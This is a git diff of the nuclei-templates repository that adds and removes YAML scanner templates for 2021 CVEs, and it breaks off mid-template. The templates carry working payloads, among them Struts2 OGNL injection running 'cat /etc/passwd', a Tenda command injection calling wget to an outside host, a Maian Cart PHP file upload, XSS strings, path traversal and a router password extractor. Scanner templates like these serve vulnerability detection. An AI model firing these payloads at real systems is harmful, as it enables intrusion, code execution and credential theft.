b/nuclei-templates/CVE-2021/CVE-2021-29156.yaml new file mode 100644 index 0000000000..b92aededf1 --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-29156.yaml @@ -0,0 +1,21 @@ +id: CVE-2021-29156 + +info: + name: LDAP Injection In Openam + author: melbadry9,xelkomy + severity: high + tags: cve,cve2021,openam + description: The vulnerability was found in the password reset feature that OpenAM provides. When a user tries to reset his password, he is asked to enter his username then the backend validates whether the user exists or not through an LDAP query before the password reset token is sent to the user’s email. + reference: https://blog.cybercastle.io/ldap-injection-in-openam/ + +requests: + - method: GET + path: + - "{{BaseURL}}/openam/ui/PWResetUserValidation" + - "{{BaseURL}}/OpenAM-11.0.0/ui/PWResetUserValidation" + - "{{BaseURL}}/ui/PWResetUserValidation" + + matchers: + - type: dsl + dsl: + - 'contains(body, "jato.pageSession") && status_code==200' diff --git a/nuclei-templates/CVE-2021/CVE-2021-29441.yaml b/nuclei-templates/CVE-2021/CVE-2021-29441.yaml deleted file mode 100644 index ac947cde4f..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-29441.yaml +++ /dev/null @@ -1,49 +0,0 @@ -id: CVE-2021-29441 - -info: - name: Nacos prior to 1.4.1 Authentication Bypass - description: | - This template only works on Nuclei engine prior to version 2.3.3 and version >= 2.3.5. - - In Nacos before version 1.4.1, when configured to use authentication (-Dnacos.core.auth.enabled=true) - Nacos uses the AuthFilter servlet filter to enforce authentication. This filter has a backdoor that - enables Nacos servers to bypass this filter and therefore skip authentication checks. - This mechanism relies on the user-agent HTTP header so it can be easily spoofed. - This issue may allow any user to carry out any administrative tasks on the Nacos server. - author: dwisiswant0 - severity: high - reference: https://securitylab.github.com/advisories/GHSL-2020-325_326-nacos/ - tags: nacos,auth-bypass,cve,cve2021 - -requests: - - raw: - - | - POST /nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld HTTP/1.1 - Host: {{Hostname}} - Accept: */* - - - | - POST /nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld HTTP/1.1 - Host: {{Hostname}} - Accept: */* - User-Agent: Nacos-Server - - req-condition: true - matchers-condition: and - matchers: - - type: dsl - dsl: - - "status_code_1 == 403" - - "status_code_2 == 200" - condition: and - - - type: dsl - dsl: - - "contains(body_1, 'Forbidden')" - - "body_2 == 'true'" - condition: and - - - type: word - words: - - "application/json" - part: header \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-29442.yaml b/nuclei-templates/CVE-2021/CVE-2021-29442.yaml new file mode 100644 index 0000000000..9f495334b8 --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-29442.yaml @@ -0,0 +1,39 @@ +id: CVE-2021-29442 + +info: + name: Nacos prior to 1.4.1 Missing Authentication Check + author: dwisiswant0 + severity: high + description: | + In Nacos before version 1.4.1, the ConfigOpsController lets the user perform management operations like querying the database or even wiping it out. + While the /data/remove endpoint is properly protected with the @Secured annotation, the /derby endpoint is not protected and can be openly accessed by unauthenticated users. + These endpoints are only valid when using embedded storage (derby DB) so this issue should not affect those installations using external storage (e.g. mysql) + reference: + - https://securitylab.github.com/advisories/GHSL-2020-325_326-nacos/ + - https://github.com/alibaba/nacos/issues/4463 + - https://github.com/alibaba/nacos/pull/4517 + - https://github.com/advisories/GHSA-36hp-jr8h-556f + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2021-29442 + cwe-id: CWE-306 + tags: nacos,auth-bypass,cve,cve2021 + +requests: + - method: GET + path: + - "{{BaseURL}}/nacos/v1/cs/ops/derby?sql=select+st.tablename+from+sys.systables+st" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "application/json" + part: header + - type: regex + regex: + - "\"TABLENAME\":\"(?:(?:(?:(?:(?:APP_CONFIGDATA_RELATION_[PS]UB|SYS(?:(?:CONGLOMERAT|ALIAS|(?:FI|RO)L)E|(?:(?:ROUTINE)?|COL)PERM|(?:FOREIGN)?KEY|CONSTRAINT|T(?:ABLEPERM|RIGGER)|S(?:TAT(?:EMENT|ISTIC)|EQUENCE|CHEMA)|DEPEND|CHECK|VIEW|USER)|USER|ROLE)S|CONFIG_(?:TAGS_RELATION|INFO_(?:AGGR|BETA|TAG))|TENANT_CAPACITY|GROUP_CAPACITY|PERMISSIONS|SYSCOLUMNS|SYS(?:DUMMY1|TABLES)|APP_LIST)|CONFIG_INFO)|TENANT_INFO)|HIS_CONFIG_INFO)\"" + part: body diff --git a/nuclei-templates/CVE-2021/CVE-2021-29490.yaml b/nuclei-templates/CVE-2021/CVE-2021-29490.yaml deleted file mode 100644 index dd34b27962..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-29490.yaml +++ /dev/null @@ -1,39 +0,0 @@ -id: CVE-2021-29490 - -info: - name: Jellyfin 10.7.2 - Server Side Request Forgery - author: alph4byt3 - severity: medium - description: | - Jellyfin is a free software media system. Versions 10.7.2 and below are vulnerable to unauthenticated Server-Side Request Forgery (SSRF) attacks via the imageUrl parameter. - reference: - - https://github.com/jellyfin/jellyfin/security/advisories/GHSA-rgjw-4fwc-9v96 - - https://nvd.nist.gov/vuln/detail/CVE-2021-29490 - remediation: Upgrade to version 10.7.3 or newer. As a workaround, disable external access to the API endpoints "/Items/*/RemoteImages/Download", "/Items/RemoteSearch/Image" and "/Images/Remote". - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N - cvss-score: 5.8 - cve-id: CVE-2021-29490 - cwe-id: CWE-918 - cpe: cpe:2.3:a:jellyfin:jellyfin:*:*:*:*:*:*:*:* - epss-score: 0.00137 - metadata: - max-request: 2 - verified: "true" - shodan-query: http.title:"Jellyfin" - tags: cve,cve2021,ssrf,jellyfin,oast - -http: - - method: GET - path: - - "{{BaseURL}}/Images/Remote?imageUrl=https://oast.me/" - - "{{BaseURL}}/Items/RemoteSearch/Image?ImageUrl=https://oast.me/&ProviderName=TheMovieDB" - - stop-at-first-match: true - matchers: - - type: word - part: body - words: - - "

Interactsh Server

" - -# Enhanced by cs on 2022/02/25 diff --git a/nuclei-templates/CVE-2021/CVE-2021-3002.yaml b/nuclei-templates/CVE-2021/CVE-2021-3002.yaml deleted file mode 100644 index 78d297f0cc..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-3002.yaml +++ /dev/null @@ -1,55 +0,0 @@ -id: CVE-2021-3002 - -info: - name: Seo Panel 4.8.0 - Cross-Site Scripting - author: edoardottt - severity: medium - description: Seo Panel 4.8.0 contains a reflected cross-site scripting vulnerability via the seo/seopanel/login.php?sec=forgot email parameter. - remediation: | - Upgrade to a patched version of Seo Panel or apply the necessary security patches provided by the vendor. - reference: - - http://www.cinquino.eu/SeoPanelReflect.htm - - https://github.com/seopanel/Seo-Panel/issues/202 - - https://nvd.nist.gov/vuln/detail/CVE-2021-3002 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2021-3002 - cwe-id: CWE-79 - epss-score: 0.00143 - epss-percentile: 0.50057 - cpe: cpe:2.3:a:seopanel:seo_panel:4.8.0:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: "seopanel" - product: seo_panel - tags: cve,cve2021,seopanel,xss - -http: - - raw: - - | - POST /seo/seopanel/login.php?sec=forgot HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - sec=requestpass&email=test%40test.com%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3e11&code=AAAAA&login= - - matchers-condition: and - matchers: - - type: word - part: header - words: - - "text/html" - - - type: word - part: body - words: - - "" - - "seopanel" - condition: and - - - type: status - status: - - 200 - -# digest: 4b0a00483046022100eb88e630e99977782da4c5dfa3cf15660a5b3510acdcb96cdd6dea7d14636aaf02210089a6e8521b366b3f500b51f5ea49287b196932ea3698b5c295be7ff659a0bad0:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/CVE-2021/CVE-2021-30049.yaml b/nuclei-templates/CVE-2021/CVE-2021-30049.yaml new file mode 100644 index 0000000000..6cff3a24b3 --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-30049.yaml @@ -0,0 +1,37 @@ +id: CVE-2021-30049 + +info: + name: SysAid Technologies 20.3.64 b14 Reflected XSS + author: daffainfo + severity: medium + description: SysAid 20.3.64 b14 is affected by Cross Site Scripting (XSS) via a /KeepAlive.jsp?stamp= URI. + reference: + - https://eh337.net/2021/03/30/sysaid/ + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30049 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-30049 + cwe-id: CWE-79 + tags: cve,cve2021,xss + +requests: + - method: GET + path: + - '{{BaseURL}}/KeepAlive.jsp?stamp=16170297%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2021/CVE-2021-30151.yaml b/nuclei-templates/CVE-2021/CVE-2021-30151.yaml deleted file mode 100644 index 4c58103107..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-30151.yaml +++ /dev/null @@ -1,37 +0,0 @@ -id: CVE-2021-30151 - -info: - name: Sidekiq 5.1.3 and 6.x-6.2.0 - Cross-Site Scripting - author: DhiyaneshDk - severity: medium - description: Sidekiq through 5.1.3 and 6.x through 6.2.0 allows XSS via the queue name of the live-poll feature when Internet Explorer is used. - reference: - - https://github.com/mperham/sidekiq/issues/4852 - - https://nvd.nist.gov/vuln/detail/CVE-2021-30151 - - https://lists.debian.org/debian-lts-announce/2022/03/msg00015.html - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2021-30151 - cwe-id: CWE-79 - tags: cve,cve2021,xss,sidekiq - -requests: - - method: GET - path: - - '{{BaseURL}}/sidekiq/queues/"onmouseover="alert(nuclei)"' - matchers-condition: and - matchers: - - type: word - part: body - words: - - "onmouseover=\"alert('nuclei')" - - - type: word - part: header - words: - - "text/html" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2021/CVE-2021-3017.yaml b/nuclei-templates/CVE-2021/CVE-2021-3017.yaml new file mode 100644 index 0000000000..7a07931362 --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-3017.yaml @@ -0,0 +1,43 @@ +id: CVE-2021-3017 + +info: + name: Intelbras WIN 300/WRN 342 Credential Disclosure + author: pikpikcu + severity: high + description: Intelbras WIN 300 and WRN 342 devices through 2021-01-04 allows remote attackers to discover credentials by reading the def_wirelesspassword line in the HTML source code. + reference: + - https://poc.wgpsec.org/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/Intelbras/Intelbras%20Wireless%20%E6%9C%AA%E6%8E%88%E6%9D%83%E4%B8%8E%E5%AF%86%E7%A0%81%E6%B3%84%E9%9C%B2%20CVE-2021-3017.html + - https://nvd.nist.gov/vuln/detail/CVE-2021-3017 + - https://www.intelbras.com/pt-br/ajuda-download/faq/roteador-wireless-veloz-wrn-342 + - https://pastebin.com/cTYTf0Yn + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2021-3017 + tags: cve,cve2021,exposure,router + +requests: + - method: GET + path: + - "{{BaseURL}}/index.asp" + + matchers-condition: and + matchers: + - type: word + words: + - 'def_wirelesspassword =' + - 'Roteador Wireless' + part: body + condition: and + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + regex: + - 'def_wirelesspassword = "([A-Za-z0-9=]+)";' + +# Enhanced by mp on 2022/03/30 diff --git a/nuclei-templates/CVE-2021/cve-2021-30213.yaml b/nuclei-templates/CVE-2021/CVE-2021-30213.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-30213.yaml rename to nuclei-templates/CVE-2021/CVE-2021-30213.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-30497.yaml b/nuclei-templates/CVE-2021/CVE-2021-30497.yaml new file mode 100644 index 0000000000..e2a3ea14f8 --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-30497.yaml @@ -0,0 +1,24 @@ +id: CVE-2021-30497 + +info: + name: Ivanti Avalanche Directory Traversal + author: gy741 + severity: high + reference: https://ssd-disclosure.com/ssd-advisory-ivanti-avalanche-directory-traversal/ + tags: cve,cve2021,avalanche,traversal + +requests: + - method: GET + path: + - "{{BaseURL}}/AvalancheWeb/image?imageFilePath=C:/windows/win.ini" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "for 16-bit app support" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2021/CVE-2021-31537.yaml b/nuclei-templates/CVE-2021/CVE-2021-31537.yaml new file mode 100644 index 0000000000..0e40527eea --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-31537.yaml @@ -0,0 +1,28 @@ +id: CVE-2021-31537 + +info: + name: SIS-REWE GO version 7.5.0/12C XSS + author: geeknik + description: SIS SIS-REWE Go before 7.7 SP17 allows XSS -- rewe/prod/web/index.php (affected parameters are config, version, win, db, pwd, and user) and /rewe/prod/web/rewe_go_check.php (version and all other parameters). + reference: https://sec-consult.com/vulnerability-lab/advisory/reflected-xss-sis-infromatik-rewe-go-cve-2021-31537/ + severity: medium + tags: cve,cve2021,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/rewe/prod/web/rewe_go_check.php?config=rewe&version=7.5.0%3cscript%3econfirm({{randstr}})%3c%2fscript%3e&win=2707" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "" + - "SIS-REWE" + condition: and + + - type: word + part: header + words: + - "text/html" diff --git a/nuclei-templates/CVE-2021/cve-2021-31589.yaml b/nuclei-templates/CVE-2021/CVE-2021-31589.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-31589.yaml rename to nuclei-templates/CVE-2021/CVE-2021-31589.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-31602.yaml b/nuclei-templates/CVE-2021/CVE-2021-31602.yaml new file mode 100644 index 0000000000..133cdd0d9f --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-31602.yaml @@ -0,0 +1,45 @@ +id: CVE-2021-31602 + +info: + name: Hitachi Vantara Pentaho/Business Intelligence Server - Authentication Bypass + author: pussycat0x + severity: high + description: Hitachi Vantara Pentaho through 9.1 and Pentaho Business Intelligence Server through 7.x are vulnerable to authentication bypass. The Security Model has different layers of Access Control. One of these layers is the applicationContext security, which is defined in the applicationContext-spring-security.xml file. The default configuration allows an unauthenticated user with no previous knowledge of the platform settings to extract pieces of information without possessing valid credentials. + reference: + - https://seclists.org/fulldisclosure/2021/Nov/13 + - https://portswigger.net/daily-swig/remote-code-execution-sql-injection-bugs-uncovered-in-pentaho-business-analytics-software + - https://hawsec.com/publications/pentaho/HVPENT210401-Pentaho-BA-Security-Assessment-Report-v1_1.pdf + - https://www.hitachi.com/hirt/security/index.html + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31602 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2021-31602 + cwe-id: CWE-863 + epss-score: 0.4123 + metadata: + max-request: 2 + shodan-query: Pentaho + tags: spring,seclists,cve,cve2021,pentaho,auth-bypass + +http: + - method: GET + path: + - "{{BaseURL}}/pentaho/api/userrolelist/systemRoles?require-cfg.js" + - "{{BaseURL}}/api/userrolelist/systemRoles?require-cfg.js" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - '' + - 'Anonymous' + condition: and + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/07/15 diff --git a/nuclei-templates/CVE-2021/CVE-2021-31755.yaml b/nuclei-templates/CVE-2021/CVE-2021-31755.yaml new file mode 100644 index 0000000000..d1d4550b3f --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-31755.yaml @@ -0,0 +1,32 @@ +id: CVE-2021-31755 + +info: + name: Tenda Router AC11 RCE + description: Vulnerabilities in the web-based management interface of enda Router AC11 could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. + author: gy741 + severity: critical + reference: | + - https://github.com/Yu3H0/IoT_CVE/tree/main/Tenda/CVE_3 + - https://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai + tags: cve,cve2021,tenda,rce,oob + +requests: + - raw: + - | + POST /goform/setmac HTTP/1.1 + Host: {{Hostname}} + Connection: close + Accept-Encoding: gzip, deflate + Accept: */* + Origin: http://{{Hostname}} + Referer: http://{{Hostname}}/index.htmlr + User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 + Content-Type: application/x-www-form-urlencoded + + module1=wifiBasicCfg&doubleBandUnityEnable=false&wifiTotalEn=true&wifiEn=true&wifiSSID=Tenda_B0E040&mac=wget+http://{{interactsh-url}}&wifiSecurityMode=WPAWPA2%2FAES&wifiPwd=Password12345&wifiHideSSID=false&wifiEn_5G=true&wifiSSID_5G=Tenda_B0E040_5G&wifiSecurityMode_5G=WPAWPA2%2FAES&wifiPwd_5G=Password12345&wifiHideSSID_5G=false&module2=wifiGuest&guestEn=false&guestEn_5G=false&guestSSID=Tenda_VIP&guestSSID_5G=Tenda_VIP_5G&guestPwd=&guestPwd_5G=&guestValidTime=8&guestShareSpeed=0&module3=wifiPower&wifiPower=high&wifiPower_5G=high&module5=wifiAdvCfg&wifiMode=bgn&wifiChannel=auto&wifiBandwidth=auto&wifiMode_5G=ac&wifiChannel_5G=auto&wifiBandwidth_5G=auto&wifiAntijamEn=false&module6=wifiBeamforming&wifiBeaformingEn=true&module7=wifiWPS&wpsEn=true&wanType=static + + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" diff --git a/nuclei-templates/CVE-2021/cve-2021-31800.yaml b/nuclei-templates/CVE-2021/CVE-2021-31800.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-31800.yaml rename to nuclei-templates/CVE-2021/CVE-2021-31800.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-31805.yaml b/nuclei-templates/CVE-2021/CVE-2021-31805.yaml deleted file mode 100644 index 8b70dbaa8d..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-31805.yaml +++ /dev/null @@ -1,48 +0,0 @@ -id: CVE-2021-31805 -info: - name: Apache Struts2 S2-062 - Remote Code Execution - author: taielab - severity: critical - description: Apache Struts2 S2-062 is vulnerable to remote code execution. The fix issued for CVE-2020-17530 (S2-061) was incomplete, meaning some of the tag's attributes could still perform a double evaluation if a developer applied forced OGNL evaluation by using the %{...} syntax. - reference: - - https://cwiki.apache.org/confluence/display/WW/S2-062 - - https://github.com/Axx8/Struts2_S2-062_CVE-2021-31805 - - https://nvd.nist.gov/vuln/detail/CVE-2021-31805 - remediation: Avoid using forced OGNL evaluation on untrusted user input, and/or upgrade to Struts 2.5.30 or greater which checks if expression evaluation won't lead to the double evaluation. - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2021-31805 - cwe-id: CWE-917 - tags: cve,cve2021,apache,rce,struts,struts2 -requests: - - raw: - - | - POST / HTTP/1.1 - Host: {{Hostname}} - Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwF - Content-Length: 1095 - - ------WebKitFormBoundaryl7d1B1aGsV2wcZwF - Content-Disposition: form-data; name="id" - - %{ - (#request.map=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) + - (#request.map.setBean(#request.get('struts.valueStack')) == true).toString().substring(0,0) + - (#request.map2=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) + - (#request.map2.setBean(#request.get('map').get('context')) == true).toString().substring(0,0) + - (#request.map3=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) + - (#request.map3.setBean(#request.get('map2').get('memberAccess')) == true).toString().substring(0,0) + - (#request.get('map3').put('excludedPackageNames',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) + - (#request.get('map3').put('excludedClasses',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) + - (#application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec({'cat /etc/passwd'})) - } - - ------WebKitFormBoundaryl7d1B1aGsV2wcZwF— - matchers: - - type: regex - part: body - regex: - - "root:.*:0:0:" - -# Enhanced by mp on 2022/04/21 diff --git a/nuclei-templates/CVE-2021/CVE-2021-32172.yaml b/nuclei-templates/CVE-2021/CVE-2021-32172.yaml deleted file mode 100644 index e5bbb54bfc..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-32172.yaml +++ /dev/null @@ -1,57 +0,0 @@ -id: CVE-2021-32172 - -info: - name: Maian Cart <=3.8 - Remote Code Execution - author: pdteam - severity: critical - description: Maian Cart 3.0 to 3.8 via the elFinder file manager plugin contains a remote code execution vulnerability. - reference: - - https://dreyand.github.io/maian-cart-rce/ - - https://github.com/DreyAnd/maian-cart-rce - - https://www.maianscriptworld.co.uk/critical-updates - - https://nvd.nist.gov/vuln/detail/CVE-2021-32172 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2021-32172 - cwe-id: CWE-862 - tags: cve,cve2021,rce,unauth,maian - -requests: - - raw: - - | - GET /admin/index.php?p=ajax-ops&op=elfinder&cmd=mkfile&name={{randstr}}.php&target=l1_Lw HTTP/1.1 - Host: {{Hostname}} - Accept: */* - - - | - POST /admin/index.php?p=ajax-ops&op=elfinder HTTP/1.1 - Host: {{Hostname}} - Accept: application/json, text/javascript, /; q=0.01 - Accept-Language: en-US,en;q=0.5 - Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - - cmd=put&target={{hash}}&content=%3c%3fphp%20echo%20%22{{randstr_1}}%22%3b%20%3f%3e - - - | - GET /product-downloads/{{randstr}}.php HTTP/1.1 - Host: {{Hostname}} - Accept: */* - - extractors: - - type: regex - name: hash - internal: true - group: 1 - regex: - - '"hash"\:"(.*?)"\,' - - req-condition: true - matchers: - - type: dsl - dsl: - - 'contains(body_3, "{{randstr_1}}")' - - "status_code_3 == 200" - condition: and - -# Enhanced by mp on 2022/05/18 diff --git a/nuclei-templates/CVE-2021/CVE-2021-32618.yaml b/nuclei-templates/CVE-2021/CVE-2021-32618.yaml new file mode 100644 index 0000000000..463eae47d6 --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-32618.yaml @@ -0,0 +1,28 @@ +id: CVE-2021-32618 + +info: + name: Flask Security Open Redirect + author: 0x_Akoko + severity: medium + description: There is code in FS to validate that the url specified in the next parameter is either relative OR has the same netloc (network location) as the requesting URL. This check utilizes Pythons urlsplit library. However many browsers are very lenient on the kind of URL they accept and 'fill in the blanks' when presented with a possibly incomplete URL. As a concrete example - setting http://login?next=\\\github.com will pass FS's relative URL check however many browsers will gladly convert this to http://github.com. + reference: + - https://github.com/Flask-Middleware/flask-security/issues/486 + - https://www.cvedetails.com/cve/CVE-2021-32618 + tags: cve,cve2021,redirect,flask + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-32618 + cwe-id: CWE-601 + +requests: + - method: GET + + path: + - '{{BaseURL}}/login?next=\\\example.com' + + matchers: + - type: regex + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$' + part: header diff --git a/nuclei-templates/CVE-2021/CVE-2021-32682.yaml b/nuclei-templates/CVE-2021/CVE-2021-32682.yaml new file mode 100644 index 0000000000..d5903bdecb --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-32682.yaml @@ -0,0 +1,49 @@ +id: CVE-2021-32682 + +info: + name: elFinder 2.1.58 - Remote Code Execution + author: smaranchand + severity: critical + description: elFinder 2.1.58 is impacted by multiple remote code execution vulnerabilities that could allow an attacker to execute arbitrary code and commands on the server hosting the elFinder PHP connector, even with minimal configuration. + reference: + - https://smaranchand.com.np/2022/01/organization-vendor-application-security/ + - https://blog.sonarsource.com/elfinder-case-study-of-web-file-manager-vulnerabilities + - https://github.com/Studio-42/elFinder/security/advisories/GHSA-wph3-44rj-92pr + - https://nvd.nist.gov/vuln/detail/CVE-2021-32682 + remediation: Update to elFinder 2.1.59 or later. As a workaround, ensure the connector is not exposed without authentication. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-32682 + cwe-id: CWE-22,CWE-78,CWE-918 + metadata: + github: https://github.com/Studio-42/elFinder + tags: cve,cve2021,elfinder,misconfig,rce,oss + +requests: + - method: GET + path: + - "{{BaseURL}}/admin/elfinder/elfinder-cke.html" + - "{{BaseURL}}/assets/backend/elfinder/elfinder-cke.html" + - "{{BaseURL}}/assets/elFinder-2.1.9/elfinder.html" + - "{{BaseURL}}/assets/elFinder/elfinder.html" + - "{{BaseURL}}/backend/elfinder/elfinder-cke.html" + - "{{BaseURL}}/elfinder/elfinder-cke.html" + - "{{BaseURL}}/uploads/assets/backend/elfinder/elfinder-cke.html" + - "{{BaseURL}}/uploads/assets/backend/elfinder/elfinder.html" + - "{{BaseURL}}/uploads/elfinder/elfinder-cke.html" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + words: + - "elfinder" + - "php/connector" + condition: and + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/04/19 diff --git a/nuclei-templates/CVE-2021/cve-2021-32819.yaml b/nuclei-templates/CVE-2021/CVE-2021-32819.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-32819.yaml rename to nuclei-templates/CVE-2021/CVE-2021-32819.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-32820.yaml b/nuclei-templates/CVE-2021/CVE-2021-32820.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-32820.yaml rename to nuclei-templates/CVE-2021/CVE-2021-32820.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-3293.yaml b/nuclei-templates/CVE-2021/CVE-2021-3293.yaml new file mode 100644 index 0000000000..9b5fa0712c --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-3293.yaml @@ -0,0 +1,47 @@ +id: CVE-2021-3293 + +info: + name: emlog 5.3.1 Path Disclosure + author: h1ei1 + severity: medium + description: emlog v5.3.1 is susceptible to full path disclosure via t/index.php, which allows an attacker to see the path to the webroot/file. + remediation: | + Apply the latest patch or upgrade to a version that fixes the vulnerability. + reference: + - https://github.com/emlog/emlog/issues/62 + - https://github.com/thinkgad/Bugs/blob/main/emlog%20v5.3.1%20has%20Full%20Path%20Disclosure%20vulnerability.md + - https://nvd.nist.gov/vuln/detail/CVE-2021-3293 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2021-3293 + cwe-id: CWE-22 + epss-score: 0.003 + epss-percentile: 0.66131 + cpe: cpe:2.3:a:emlog:emlog:5.3.1:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: emlog + product: emlog + tags: cve,cve2021,emlog,fpd + +http: + - raw: + - | + GET /t/index.php?action[]=aaaa HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + words: + - "Warning" + - "on line" + - "expects parameter" + condition: and + + - type: status + status: + - 200 + +# digest: 4a0a0047304502210089bc0f78f385afff82fcf6eea96c7953dfede23a4d287b33bb5ab5234d08841202200378142d7a77757a030b2fc8efec90b04024d6a6d084bd3514dc57deceb7ebee:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/CVE-2021/CVE-2021-3297.yaml b/nuclei-templates/CVE-2021/CVE-2021-3297.yaml deleted file mode 100644 index 1c8850cd17..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-3297.yaml +++ /dev/null @@ -1,38 +0,0 @@ -id: CVE-2021-3297 - -info: - name: Zyxel NBG2105 V1.00(AAGU.2)C0 - Authentication Bypass - author: gy741 - severity: high - description: On Zyxel NBG2105 V1.00(AAGU.2)C0 devices, setting the login cookie to 1 provides administrator access. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2021-3297 - - https://github.com/nieldk/vulnerabilities/blob/main/zyxel%20nbg2105/Admin%20bypass - - https://www.zyxel.com/us/en/support/security_advisories.shtml - - https://www.zyxel.com/support/SupportLandingSR.shtml?c=gb&l=en&kbid=M-01490&md=NBG2105 - classification: - cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 7.8 - cve-id: CVE-2021-3297 - cwe-id: CWE-287 - tags: cve,cve2021,zyxel,auth-bypass,router - -requests: - - raw: - - | - GET /status.htm HTTP/1.1 - Host: {{Hostname}} - Cookie: language=en; login=1 - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - "Running 